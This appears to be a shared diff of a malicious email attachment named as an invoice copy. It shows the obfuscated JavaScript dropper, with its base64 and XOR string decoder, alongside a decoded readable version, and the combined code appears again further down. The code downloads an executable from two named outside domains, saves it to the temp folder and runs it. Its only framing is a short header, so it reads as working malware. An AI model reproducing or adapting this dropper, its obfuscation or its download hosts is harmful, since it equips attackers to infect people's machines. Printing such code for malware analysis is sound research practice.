vaibhavpandeyvpz · February 16, 2016 12:47
diff --git a/invoice_copy_Bqa6Ci.decoded.js b/invoice_copy_Bqa6Ci.decoded.js
 (function() {
    var urls = [
        'http://wherareyoufromff.com/25.exe',
        'http://arendroukysdqq.com/25.exe'
    ];
    var shell = WScript.CreateObject('WScript.Shell');
    var xmlhttp = WScript.CreateObject('MSXML2.XMLHTTP');
    var stream = WScript.CreateObject('ADODB.Stream');
    var tmp = shell.ExpandEnvironmentStrings('%TEMP%\\');
    var file = tmp + 4194304 + '.exe';
    var downloaded = false;
    for (var i = 0; i < urls.length; i++) {
        try {
            var url = urls[i];
            xmlhttp.open('CreateObject', url, false);
            xmlhttp.send();
            if (xmlhttp.status == 200) {
                try {
                    stream.open();
                    stream.type = 1;
                    stream.write(xmlhttp.responseBody);
                    if (stream.size > 254976) {
                        i = urls.length;
                        stream.position = 0;
                        stream.saveToFile(file, 2);
                        downloaded = true;
                        break;
                    }
                } finally {
                    stream.close();
                }
            }
        } catch (ignored) {
        }
    }
    if (downloaded) {
        shell.Exec(tmp + 4194304);
    }
 })();
diff --git a/invoice_copy_Bqa6Ci.js b/invoice_copy_Bqa6Ci.js
 function decode(willfulbRL, yieldwDd, projectr6v) {
    willfulbRL = willfulbRL.replace(/[^A-Za-z0-9\+\/\=]/g, "");
    var blightedfEC = [ 62, -1, -1, -1, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, 64, -1, -1, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51 ];
    var punditpfm = yieldwDd;
    if (!punditpfm) {
        punditpfm = new Uint8Array(Math.ceil(willfulbRL.length / 4) * 3);
    }
    projectr6v = projectr6v || 0;
    var gravityi7v, wryL9G, insinuateFyG, effluviumf6q;
    var dwellDRs = 0, equableXXH = projectr6v;
    while (dwellDRs < willfulbRL.length) {
        gravityi7v = blightedfEC[willfulbRL.charCodeAt(dwellDRs++) - 43];
        wryL9G = blightedfEC[willfulbRL.charCodeAt(dwellDRs++) - 43];
        insinuateFyG = blightedfEC[willfulbRL.charCodeAt(dwellDRs++) - 43];
        effluviumf6q = blightedfEC[willfulbRL.charCodeAt(dwellDRs++) - 43];
        punditpfm[equableXXH++] = gravityi7v << 2 | wryL9G >> 4;
        if (insinuateFyG !== 64) {
            punditpfm[equableXXH++] = (wryL9G & 15) << 4 | insinuateFyG >> 2;
            if (effluviumf6q !== 64) {
                punditpfm[equableXXH++] = (insinuateFyG & 3) << 6 | effluviumf6q;
            }
        }
    }
    return yieldwDd ? equableXXH - projectr6v : punditpfm.subarray(0, equableXXH);
 }

 var notwithstandingpkD = function(campaignnf2) {
    var incipientkat = [];
    var preenXZH = decode(campaignnf2, incipientkat);
    var gustopnH = "charCodeAt";
    var inflammatoryDTn = "";
    for (var dwellDRs = 0; dwellDRs < preenXZH; dwellDRs++) {
        inflammatoryDTn += String.fromCharCode(incipientkat[dwellDRs] ^ "mjaPIXtQ0QpNaaxH"[gustopnH](dwellDRs % "mjaPIXtQ0QpNaaxH".length));
    }
    return inflammatoryDTn;
 };

 var rangingMiw = function() {
    var cleaveVvF = function() {};
    cleaveVvF.prototype.yQhSoIY7NN = function(establishcw9) {
        var nicetyek4 = notwithstandingpkD('"LhgEMT09OzNaNBM6"');
        return WScript[nicetyek4](establishcw9);
    };
    return cleaveVvF;
 }();

 (function() {
    var mienbC5 = new rangingMiw();
    var commissionURF = 200;
    var discreetlbf = notwithstandingpkD('"Ki81"');
    var attitudeNKt = notwithstandingpkD('"KBIEMw=="');
    var construejUz = notwithstandingpkD('"AhoEPg=="');
    var incipientbeW = notwithstandingpkD('"OjkCIiAoAH9jORUiDQ=="');
    var veritablea7S = notwithstandingpkD('"IDk5HQVqWgl9HTgaNTE="');
    var vapidPnt = notwithstandingpkD('"GFMtAAoeMD12CQ=="');
    var frontieroWl = notwithstandingpkD('"Lz0NJB87TTdxBQ=="');
    var weltbit = notwithstandingpkD('"FSYWJjhqPiR3NQ=="');
    var plenitudeW41 = notwithstandingpkD('"IDIjHgMBMWdUAA=="');
    var forebodingT4l = notwithstandingpkD('"FSEiZwgLPGBIOg=="');
    var premiseoOT = notwithstandingpkD('"ADkoNw4tEwZiGg=="');
    var succorYIl = notwithstandingpkD('"Cz8GPCYMQxdWCA=="');
    var quaffJ01 = notwithstandingpkD('"Phk1Ii4ILSVgAg=="');
    var prognosticatea8B = notwithstandingpkD('"CVwuBQcQPQlIKA=="');
    var hummockRan = notwithstandingpkD('"LC4uFAs="');
    var meanderwfu = notwithstandingpkD('"Ph4TNSg1"');
    var declivityy8l = notwithstandingpkD('"SD4kHRl9KA=="');
    var stumppe5 = notwithstandingpkD('"Qw8ZNQ=="');
    var acquiesceBbn = Math.pow(2, 10) * 249;
    var effeteglf = [ notwithstandingpkD('"BR4VIHN3WyZYNAIvEwQBJxgMEz8kPhJ/Uz4dYVNUVi0VDw=="'), notwithstandingpkD('"BR4VIHN3WzBCNB4qEw4NIxQZBSE4dhc+XX5Ce08EAC0="') ];
    var enduex6F = 4194304;
    var speciousO8k = mienbC5[notwithstandingpkD('"FDsJAyYRLWZ+Hw=="')];
    var erodeBHe = speciousO8k(incipientbeW);
    var dispatchXcP = speciousO8k(veritablea7S);
    var crabbedsyo = speciousO8k(hummockRan + notwithstandingpkD('"Qw=="') + meanderwfu);
    var archetypeoZs = erodeBHe.ExpandEnvironmentStrings(declivityy8l);
    var contractlbs = archetypeoZs + enduex6F + stumppe5;
    var gawkbBz = false;
    for (var scrupulousbKq = 0; scrupulousbKq < effeteglf.length; scrupulousbKq++) {
        try {
            var nostrumLvw = effeteglf[scrupulousbKq];
            dispatchXcP.open(discreetlbf, nostrumLvw, false);
            dispatchXcP.send();
            if (dispatchXcP.status == commissionURF) {
                try {
                    crabbedsyo[construejUz]();
                    crabbedsyo.type = 1;
                    crabbedsyo.write(dispatchXcP[notwithstandingpkD('"Hw8SICY2BzRyPhQ3"')]);
                    if (crabbedsyo.size > acquiesceBbn) {
                        scrupulousbKq = effeteglf.length;
                        crabbedsyo.position = 0;
                        crabbedsyo.saveToFile(contractlbs, 2);
                        gawkbBz = true;
                    }
                } finally {
                    crabbedsyo.close();
                }
            }
        } catch (ignored) {}
    }
    if (gawkbBz) {
        erodeBHe[attitudeNKt](archetypeoZs + Math.pow(2, 22));
    }
 })();
	(function() {
	var urls = [
	'http://wherareyoufromff.com/25.exe',
	'http://arendroukysdqq.com/25.exe'
	];
	var shell = WScript.CreateObject('WScript.Shell');
	var xmlhttp = WScript.CreateObject('MSXML2.XMLHTTP');
	var stream = WScript.CreateObject('ADODB.Stream');
	var tmp = shell.ExpandEnvironmentStrings('%TEMP%\\');
	var file = tmp + 4194304 + '.exe';
	var downloaded = false;
	for (var i = 0; i < urls.length; i++) {
	try {
	var url = urls[i];
	xmlhttp.open('CreateObject', url, false);
	xmlhttp.send();
	if (xmlhttp.status == 200) {
	try {
	stream.open();
	stream.type = 1;
	stream.write(xmlhttp.responseBody);
	if (stream.size > 254976) {
	i = urls.length;
	stream.position = 0;
	stream.saveToFile(file, 2);
	downloaded = true;
	break;
	}
	} finally {
	stream.close();
	}
	}
	} catch (ignored) {
	}
	}
	if (downloaded) {
	shell.Exec(tmp + 4194304);
	}
	})();
	function decode(willfulbRL, yieldwDd, projectr6v) {
	willfulbRL = willfulbRL.replace(/[^A-Za-z0-9\+\/\=]/g, "");
	var blightedfEC = [ 62, -1, -1, -1, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, 64, -1, -1, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51 ];
	var punditpfm = yieldwDd;
	if (!punditpfm) {
	punditpfm = new Uint8Array(Math.ceil(willfulbRL.length / 4) * 3);
	}
	projectr6v = projectr6v \|\| 0;
	var gravityi7v, wryL9G, insinuateFyG, effluviumf6q;
	var dwellDRs = 0, equableXXH = projectr6v;
	while (dwellDRs < willfulbRL.length) {
	gravityi7v = blightedfEC[willfulbRL.charCodeAt(dwellDRs++) - 43];
	wryL9G = blightedfEC[willfulbRL.charCodeAt(dwellDRs++) - 43];
	insinuateFyG = blightedfEC[willfulbRL.charCodeAt(dwellDRs++) - 43];
	effluviumf6q = blightedfEC[willfulbRL.charCodeAt(dwellDRs++) - 43];
	punditpfm[equableXXH++] = gravityi7v << 2 \| wryL9G >> 4;
	if (insinuateFyG !== 64) {
	punditpfm[equableXXH++] = (wryL9G & 15) << 4 \| insinuateFyG >> 2;
	if (effluviumf6q !== 64) {
	punditpfm[equableXXH++] = (insinuateFyG & 3) << 6 \| effluviumf6q;
	}
	}
	}
	return yieldwDd ? equableXXH - projectr6v : punditpfm.subarray(0, equableXXH);
	}

	var notwithstandingpkD = function(campaignnf2) {
	var incipientkat = [];
	var preenXZH = decode(campaignnf2, incipientkat);
	var gustopnH = "charCodeAt";
	var inflammatoryDTn = "";
	for (var dwellDRs = 0; dwellDRs < preenXZH; dwellDRs++) {
	inflammatoryDTn += String.fromCharCode(incipientkat[dwellDRs] ^ "mjaPIXtQ0QpNaaxH"[gustopnH](dwellDRs % "mjaPIXtQ0QpNaaxH".length));
	}
	return inflammatoryDTn;
	};

	var rangingMiw = function() {
	var cleaveVvF = function() {};
	cleaveVvF.prototype.yQhSoIY7NN = function(establishcw9) {
	var nicetyek4 = notwithstandingpkD('"LhgEMT09OzNaNBM6"');
	return WScript[nicetyek4](establishcw9);
	};
	return cleaveVvF;
	}();

	(function() {
	var mienbC5 = new rangingMiw();
	var commissionURF = 200;
	var discreetlbf = notwithstandingpkD('"Ki81"');
	var attitudeNKt = notwithstandingpkD('"KBIEMw=="');
	var construejUz = notwithstandingpkD('"AhoEPg=="');
	var incipientbeW = notwithstandingpkD('"OjkCIiAoAH9jORUiDQ=="');
	var veritablea7S = notwithstandingpkD('"IDk5HQVqWgl9HTgaNTE="');
	var vapidPnt = notwithstandingpkD('"GFMtAAoeMD12CQ=="');
	var frontieroWl = notwithstandingpkD('"Lz0NJB87TTdxBQ=="');
	var weltbit = notwithstandingpkD('"FSYWJjhqPiR3NQ=="');
	var plenitudeW41 = notwithstandingpkD('"IDIjHgMBMWdUAA=="');
	var forebodingT4l = notwithstandingpkD('"FSEiZwgLPGBIOg=="');
	var premiseoOT = notwithstandingpkD('"ADkoNw4tEwZiGg=="');
	var succorYIl = notwithstandingpkD('"Cz8GPCYMQxdWCA=="');
	var quaffJ01 = notwithstandingpkD('"Phk1Ii4ILSVgAg=="');
	var prognosticatea8B = notwithstandingpkD('"CVwuBQcQPQlIKA=="');
	var hummockRan = notwithstandingpkD('"LC4uFAs="');
	var meanderwfu = notwithstandingpkD('"Ph4TNSg1"');
	var declivityy8l = notwithstandingpkD('"SD4kHRl9KA=="');
	var stumppe5 = notwithstandingpkD('"Qw8ZNQ=="');
	var acquiesceBbn = Math.pow(2, 10) * 249;
	var effeteglf = [ notwithstandingpkD('"BR4VIHN3WyZYNAIvEwQBJxgMEz8kPhJ/Uz4dYVNUVi0VDw=="'), notwithstandingpkD('"BR4VIHN3WzBCNB4qEw4NIxQZBSE4dhc+XX5Ce08EAC0="') ];
	var enduex6F = 4194304;
	var speciousO8k = mienbC5[notwithstandingpkD('"FDsJAyYRLWZ+Hw=="')];
	var erodeBHe = speciousO8k(incipientbeW);
	var dispatchXcP = speciousO8k(veritablea7S);
	var crabbedsyo = speciousO8k(hummockRan + notwithstandingpkD('"Qw=="') + meanderwfu);
	var archetypeoZs = erodeBHe.ExpandEnvironmentStrings(declivityy8l);
	var contractlbs = archetypeoZs + enduex6F + stumppe5;
	var gawkbBz = false;
	for (var scrupulousbKq = 0; scrupulousbKq < effeteglf.length; scrupulousbKq++) {
	try {
	var nostrumLvw = effeteglf[scrupulousbKq];
	dispatchXcP.open(discreetlbf, nostrumLvw, false);
	dispatchXcP.send();
	if (dispatchXcP.status == commissionURF) {
	try {
	crabbedsyo[construejUz]();
	crabbedsyo.type = 1;
	crabbedsyo.write(dispatchXcP[notwithstandingpkD('"Hw8SICY2BzRyPhQ3"')]);
	if (crabbedsyo.size > acquiesceBbn) {
	scrupulousbKq = effeteglf.length;
	crabbedsyo.position = 0;
	crabbedsyo.saveToFile(contractlbs, 2);
	gawkbBz = true;
	}
	} finally {
	crabbedsyo.close();
	}
	}
	} catch (ignored) {}
	}
	if (gawkbBz) {
	erodeBHe[attitudeNKt](archetypeoZs + Math.pow(2, 22));
	}
	})();